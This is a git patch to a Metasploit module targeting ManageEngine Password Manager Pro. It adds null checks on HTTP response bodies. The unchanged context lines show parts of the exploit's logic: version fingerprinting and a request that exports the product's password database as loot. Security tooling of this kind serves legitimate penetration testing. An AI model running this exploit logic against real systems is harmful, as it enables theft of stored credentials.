From 2236518694142b2a6033dd675ab83277605dff36 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 10 Nov 2014 09:47:05 -0600
Subject: [PATCH] Check res.body before accessing #to_s

---
 .../auxiliary/admin/http/manageengine_pmp_privesc.rb   | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb
index ae6517d5fd..c39efd7c76 100644
--- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb
+++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb
@@ -59,13 +59,13 @@ class Metasploit3 < Msf::Auxiliary
 
     if res && res.code == 200
       # 2nd step: we try to get the ORGN_NAME and AUTHRULE_NAME from the page (which is only needed for the MSP versions)
-      if res.body.to_s =~ /id="ORGN_NAME" name="ORGN_NAME" value="([\w]*)"/
+      if res.body && res.body.to_s =~ /id="ORGN_NAME" name="ORGN_NAME" value="([\w]*)"/
         orgn_name = $1
       else
         orgn_name = nil
       end
 
-      if res.body.to_s =~ /id="AUTHRULE_NAME" name="AUTHRULE_NAME" value="([\w]*)"/
+      if res.body && res.body.to_s =~ /id="AUTHRULE_NAME" name="AUTHRULE_NAME" value="([\w]*)"/
         authrule_name = $1
       else
         authrule_name = nil
@@ -83,7 +83,7 @@ class Metasploit3 < Msf::Auxiliary
           'userName' => username
         }
       })
-      if res && res.code == 200
+      if res && res.code == 200 && res.body
         domain_name = res.body.to_s.strip
       else
         domain_name = nil
@@ -192,7 +192,7 @@ class Metasploit3 < Msf::Auxiliary
                                'uri' => normalize_uri("PassTrixMain.cc"),
                                'method' => 'GET'
                            })
-    if res && res.code == 200 &&
+    if res && res.code == 200 && res.body &&
         res.body.to_s =~ /ManageEngine Password Manager Pro/ &&
         (
           res.body.to_s =~ /login\.css\?([0-9]+)/ ||                            # PMP v6
@@ -259,7 +259,7 @@ class Metasploit3 < Msf::Auxiliary
           'RequestType' => 'ExportResources'
         }
       })
-      if res && res.code == 200 && res.body.to_s.length > 0
+      if res && res.code == 200 && res.body && res.body.to_s.length > 0
         vprint_line(res.body.to_s)
         print_good("#{peer} - Successfully exported password database from Password Manager Pro.")
         loot_name     = 'manageengine.passwordmanagerpro.password.db'